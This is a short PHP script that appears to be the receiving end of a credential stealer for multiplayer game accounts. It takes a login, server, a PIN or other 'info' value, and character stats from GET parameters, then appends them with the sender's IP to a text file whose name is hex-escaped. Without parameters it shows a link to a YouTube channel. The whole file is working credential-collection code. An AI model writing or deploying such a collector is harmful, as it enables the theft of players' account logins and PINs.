<?php
if (isset($_GET) && !empty($_GET)) {
$log = $_GET['log'];
$srvr = $_GET['srvr'];
$servname = $_GET['servname'];
$did = $_GET['did'];
$inf = $_GET['inf'];
$pin = $_GET['pin'];
$skin = $_GET['skin'];
$score = $_GET['score'];
$money = $_GET['money'];
$remoteAddr = $_SERVER['REMOTE_ADDR'];
$date = date('H:i:s-d.m.y');
if (!empty($inf)) {
$message = "$date | Login: $log [skin: $skin, lvl: $score, money: $money$] | Server: $srvr [$servname] | Info[id: $did]: $inf | User-IP: $remoteAddr \r\n";
} elseif (!empty($pin)) {
$message = "$date | Login: $log [skin: $skin, lvl: $score, money: $money$] | Server: $srvr [$servname] | Info[PIN]: $pin | User-IP: $remoteAddr \r\n";
}
if (isset($message)) {
$file = fopen("By\xde\xf2\xf3\xe1\xe5\xf0\xca\xe8\xf0\xff.txt" , 'a+');
$result = fwrite($file, $message);
}
} else {
echo '<a href="https://www.youtube.com/channel/UCm9ypHcgruKSDra2xPoQ8rA">My channel</a>';
}
?>